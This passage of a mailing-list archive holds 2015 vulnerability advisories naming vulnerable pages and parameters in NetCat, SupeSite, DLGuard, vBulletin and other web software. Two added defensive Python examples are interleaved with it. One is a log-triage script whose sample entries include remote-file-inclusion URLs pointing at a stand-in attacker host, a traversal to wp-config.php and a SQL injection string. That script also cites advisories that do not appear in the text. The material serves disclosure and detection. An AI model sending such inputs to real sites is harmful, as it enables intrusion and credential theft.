NetCat has a security bug problem. It can be exploited by URL Redirection
(Open Redirect) attacks.

*(2.1)* The first vulnerability occurs at "modules/redir/?" page with
"site" parameter.

*(2.2)* The second vulnerability occurs at "redirect.php?" page with "url"
parameter.

*(2.3)* The third vulnerability occurs at "netshop/post.php" page with
"redirect_url" parameter.







*References:*
http://tetraph.com/security/open-redirect/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-url-redirection.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

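The three NetCat parameters above ("site", "url", "redirect_url") all take a redirect target straight from the request. As an added defensive example, not code from NetCat or this advisory, here is a redirect-target check that only lets relative paths and allow-listed hosts through; the ALLOWED_HOSTS entries and the hypothetical `redirect_target()` wrapper are assumptions constructed for the example.

```python
"""Allow-list check for user-supplied redirect targets (CWE-601).

Added example; not NetCat code. Shows why a naive "starts with /" or
"contains our domain" test is not enough: scheme-relative URLs, backslash
authority tricks and userinfo tricks all pass such tests in browsers.
"""
from urllib.parse import urlsplit

# Hosts this deployment may redirect to (constructed for the example).
ALLOWED_HOSTS = {"shop.example.com", "www.example.com"}
DEFAULT_TARGET = "/"


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` stays on this site or an allowed host.

    Accepts:  a relative path beginning with a single '/', or an absolute
              http(s) URL whose host is in `allowed_hosts`.
    Rejects:  '//evil.example' (scheme-relative), '/\\evil.example'
              (browsers treat '\\' as '/'), 'https://shop.example.com@evil.example'
              (userinfo), 'javascript:' and other non-http schemes, and
              'http:evil.example' (scheme with no authority).
    """
    if not target or any(ch in target for ch in "\r\n\x00"):
        return False
    # Browsers normalise backslashes to slashes in the authority section;
    # urlsplit does not, so do it first or '/\\evil.example' parses as a path.
    normalised = target.replace("\\", "/")
    parts = urlsplit(normalised)

    if not parts.scheme and not parts.netloc:
        # Relative reference: a single leading slash, never '//host/...'.
        return normalised.startswith("/") and not normalised.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False
    if not parts.netloc or "@" in parts.netloc:
        return False
    # .hostname is lower-cased and has the port stripped.
    return parts.hostname in allowed_hosts


def redirect_target(param_value: str) -> str:
    """Hypothetical wrapper: the value a redirect handler should actually use."""
    return param_value if is_safe_redirect(param_value) else DEFAULT_TARGET


if __name__ == "__main__":
    for candidate in ("/account", "https://shop.example.com:443/cart",
                      "//evil.example/", "/\\evil.example",
                      "https://shop.example.com@evil.example/", "javascript:alert(1)"):
        print(f"{candidate!r:45} -> {redirect_target(candidate)!r}")
```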


[FD] NetCat CMS Full Path Disclosure (Information Disclosure) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Full Path Disclosure (Information Disclosure) Security
Vulnerabilities*



Exploit Title: NetCat CMS Full Path Disclosure Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 5.01   3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Information Leak / Disclosure [CWE-200]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Full Path
Disclosure (Information Disclosure) attacks.

*(2.1)* The first vulnerability occurs at "netshop/post.php" page with
"redirect_url" parameter.







*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-full-path-disclosure.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities*


Exploit Title: NetCat CMS Multiple Remote File Inclusion (RFI) Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP Remote File Inclusion') [CWE-98]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Remote File
Inclusion (RFI) attacks.

*(2.1)* The first vulnerability occurs at "/eshop/index.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.2)* The second vulnerability occurs at "add.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.3)* The third vulnerability occurs at "netcat/index.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.4)* The fourth vulnerability occurs at "s_loadenv.inc.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.5) *The fifth vulnerability occurs at "*.pdf/index.php?" page with
"INCLUDE_FOLDER" parameter.










*References:*
http://tetraph.com/security/remote-local-file-inclusion-vulnerability/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-remote-file.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

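The file-inclusion parameters in this advisory (INCLUDE_FOLDER on the NetCat pages) and in the Daily Edition theme advisories above (thumb.php "src", fiche-disque.php "id") are all visible in ordinary web-server access logs. As an added defensive example, not code from any of these advisories or vendors, here is a small log-triage script that flags requests where those parameters carry a URL scheme, a traversal sequence, or a non-numeric id; the sample log lines, IPs, hostnames and the theme's directory path are constructed.

```python
"""Access-log triage for the parameters named in these advisories.

Added example; not vendor code. Flags three request shapes:
  * file/include parameters carrying a URL scheme (remote or wrapper inclusion),
  * file/include parameters that traverse out of their directory,
  * a numeric id parameter that is not a plain integer (SQL injection probe).
"""
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache combined-format entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')

# (script, parameter) pairs from the advisories. The file-style parameters
# should name a local file or folder; the id parameter should be an integer.
FILE_PARAMS = {
    ("thumb.php", "src"),
    ("index.php", "INCLUDE_FOLDER"),
    ("add.php", "INCLUDE_FOLDER"),
    ("s_loadenv.inc.php", "INCLUDE_FOLDER"),
}
NUMERIC_PARAMS = {("fiche-disque.php", "id")}

SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*:", re.I)  # http:, ftp:, php:, data:
SQLI_RE = re.compile(r"'|--|/\*|\b(?:union|select|sleep|benchmark)\b", re.I)


def check_file_param(value):
    """Finding for a path/URL parameter that leaves its intended directory, else None."""
    v = value.replace("\\", "/")
    if SCHEME_RE.match(v):
        return "remote-or-wrapper-inclusion"
    if "../" in v or v.endswith("..") or "\x00" in v:
        return "path-traversal"
    return None


def check_numeric_param(value):
    """Finding for an id that is not a plain integer, else None."""
    if value.strip().isdigit():
        return None
    return "sql-injection-probe" if SQLI_RE.search(value) else "non-numeric-id"


def inspect_request(target):
    """Inspect one request target ('/path?query'); return [(script, param, finding)]."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    findings = []
    # parse_qs percent-decodes values, so %27 is seen as a quote here.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if (script, name) in FILE_PARAMS:
                hit = check_file_param(value)
            elif (script, name) in NUMERIC_PARAMS:
                hit = check_numeric_param(value)
            else:
                hit = None
            if hit:
                findings.append((script, name, hit))
    return findings


def scan_log(lines):
    """Return [(line_number, script, param, finding)] for every suspicious request."""
    results = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            for script, name, hit in inspect_request(m.group("target")):
                results.append((n, script, name, hit))
    return results


# Constructed sample entries; the theme directory, IP and hostnames are invented.
THEME = "/wp-content/themes/daily-edition"
SAMPLE_LOG = [
    f'203.0.113.5 - - [07/Mar/2015:10:00:01 +0000] "GET {THEME}/thumb.php?src=images/logo.png&w=100 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [07/Mar/2015:10:00:02 +0000] "GET {THEME}/thumb.php?src=http://attacker.invalid/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [07/Mar/2015:10:00:03 +0000] "GET {THEME}/thumb.php?src=../../../../wp-config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [07/Mar/2015:10:00:04 +0000] "GET {THEME}/fiche-disque.php?id=17 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [07/Mar/2015:10:00:05 +0000] "GET {THEME}/fiche-disque.php?id=17%27%20OR%201=1-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Mar/2015:10:00:06 +0000] "GET /eshop/index.php?INCLUDE_FOLDER=ftp://attacker.invalid/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, script, name, hit in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {script}?{name} -> {hit}")
```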


[FD] Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS Arbitrary Code Execution Security
Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Generation of Code ('Code
Injection') [CWE-94]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite 6.0.1UC
SupeSite 7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
"SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0."

"Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions."




*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Arbitrary Code
Execution attacks.


*(2.1)* The vulnerability occurs at the normal administrator CSS editor field. If
files such as "a.php;a.css" or "*.php;*.css" are inserted, a normal administrator
can insert a webshell to control the back-end management system.









*References:*
http://tetraph.com/security/arbitrary-code-execution-vulnerability/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-arbitrary-code.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security
Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS /cp.php do parameter Reflected XSS
Security Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite 6.0.1UC
SupeSite 7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
"SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0."

"Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions."



*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Reflected XSS
(Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "cp.php?" page with "do" parameter.










*References:*
http://tetraph.com/security/xss-vulnerability/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-reflected-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=3






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities*



Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities
Product: InstantForum.NET
Vendor: InstantASP
Vulnerable Versions: v4.1.3   v4.1.1   v4.1.2   v4.0.0   v4.1.0   v3.4.0
Tested Version: v4.1.3   v4.1.1   v4.1.2
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9468
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
InstantASP


*Product & Version:*
InstantForum.NET
v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0


*Vendor URL & Download:*
InstantForum.NET can be downloaded from here,
http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html


*Product Introduction:*
“InstantForum.NET is a feature rich, ultra high performance ASP.NET & SQL
Server discussion forum solution designed to meet the needs of the most
demanding online communities or internal collaboration environments. Now in
the fourth generation, InstantForum.NET has been completely rewritten from
the ground-up over several months to introduce some truly unique features &
performance enhancements."

"The new administrator control panel now offers the most comprehensive
control panel available for any ASP.NET based forum today. Advanced
security features such as role based permissions and our unique Permission
Sets feature provides unparalleled configurable control over the content
and features that are available to your users within the forum. Moderators
can easily be assigned to specific forums with dedicated moderator
privileges for each forum. Bulk moderation options ensure even the busiest
forums can be managed effectively by your moderators."

"The forums template driven skinning architecture offers complete
customization support. Each skin can be customized to support a completely
unique layout or visual appearance. A single central style sheet controls
every aspect of a skins appearance. The use of unique HTML wrappers and
ASP.NET 1.1 master pages ensures page designers can easily integrate an
existing design around the forum. Skins, wrappers & master page templates
can be applied globally to all forums or to any specific forum."





*(2) Vulnerability Details:*
InstantForum.NET has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at “Join.aspx” page with "SessionID"
parameter of it.

*(2.2)* The second vulnerability occurs at “Logon.aspx” page with
"SessionID" parameter of it.









*References:*
http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468
https://security-tracker.debian.org/tracker/CVE-2014-9468
http://www.cvedetails.com/cve/CVE-2014-9468/
http://www.security-database.com/detail.php?alert=CVE-2014-9468
http://packetstormsecurity.com/files/cve/CVE-2014-9468
http://www.pentest.it/cve-2014-9468.html
http://www.naked-security.com/cve/CVE-2014-9468/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/
http://007software.net/cve-2014-9468/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/
https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard SQL Injection Security Vulnerabilities

2015-02-18 Thread Jing Wang
DLGuard SQL Injection Security Vulnerabilities


Exploit Title: DLGuard /index.php c parameter SQL Injection Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
"DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."

"DLGuard supports the three types, or methods, of sale on the internet:
<1>Single item sales (including bonus products!)
<2>Multiple item sales
<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by SQL Injection
attacks.


*(2.1)* The first vulnerability occurs at the "index.php" page with its "c"
parameter.







*References:*
http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Full Path Disclosure (Information Leakage) Security
Vulnerabilities*



Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
"DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."


"DLGuard supports the three types, or methods, of sale on the internet:
<1>Single item sales (including bonus products!)
<2>Multiple item sales
<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure
attacks.


*(2.1)* The first vulnerability occurs at the "index.php" page with its "c"
parameter.






*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities*



Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities

Product: DLGuard

Vendor: DLGuard

Vulnerable Versions: v5   v4.6   v4.5

Tested Version: v5   v4.6

Advisory Publication: Feb 18, 2015

Latest Update: Feb 18, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*




*(1) Vendor & Product Description:*



*Vendor:*
DLGuard



*Product & Version:*
DLGuard
v5   v4.6   v4.5



*Vendor URL & Download:*
DLGuard can be downloaded from here,

http://www.dlguard.com/dlginfo/index.php



*Product Introduction:*
"DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."

"DLGuard supports the three types, or methods, of sale on the internet:

<1>Single item sales (including bonus products!)

<2>Multiple item sales

<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at the "index.php" page with its "page",
"c" and "redirect" parameters.

*(2.2)* The second vulnerability occurs at main page's search field with
"searchTerm" parameter in HTTP POST.








*References:*
http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-9469  vBulletin XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4
Tested Version: 5.1.3 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
vBulletin


*Product & Version: *
vBulletin Forum
5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4


*Vendor URL & Download: *
vBulletin can be downloaded from here,
https://www.vbulletin.com/purchases/


*Product Introduction:*
"vBulletin (vB) is a proprietary Internet forum software package developed
by vBulletin Solutions, Inc., a division of Internet Brands. It is written
in PHP and uses a MySQL database server."

"Since the initial release of the vBulletin forum product in 2000, there
have been many changes and improvements. Below is a list of the major
revisions and some of the changes they introduced. The current production
version is 3.8.7, 4.2.2, and 5.1.3."




*(2) Vulnerability Details:*
vBulletin has a security problem. It can be exploited by XSS attacks.

*(2.1)* The vulnerability occurs at the "forum/help" page. Add the "hash
symbol" first, then add the script at the end of it.






*References:*
http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
https://security-tracker.debian.org/tracker/CVE-2014-9469
http://www.cvedetails.com/cve/CVE-2014-9469/
http://www.security-database.com/detail.php?alert=CVE-2014-9469
http://packetstormsecurity.com/files/cve/CVE-2014-9469
http://www.pentest.it/cve-2014-9469.html
http://www.naked-security.com/cve/CVE-2014-9469/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
http://007software.net/cve-2014-9469/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-8753  Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: Cit-e-Access
Vendor: Cit-e-Net
Vulnerable Versions: Version 6
Tested Version: Version 6
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
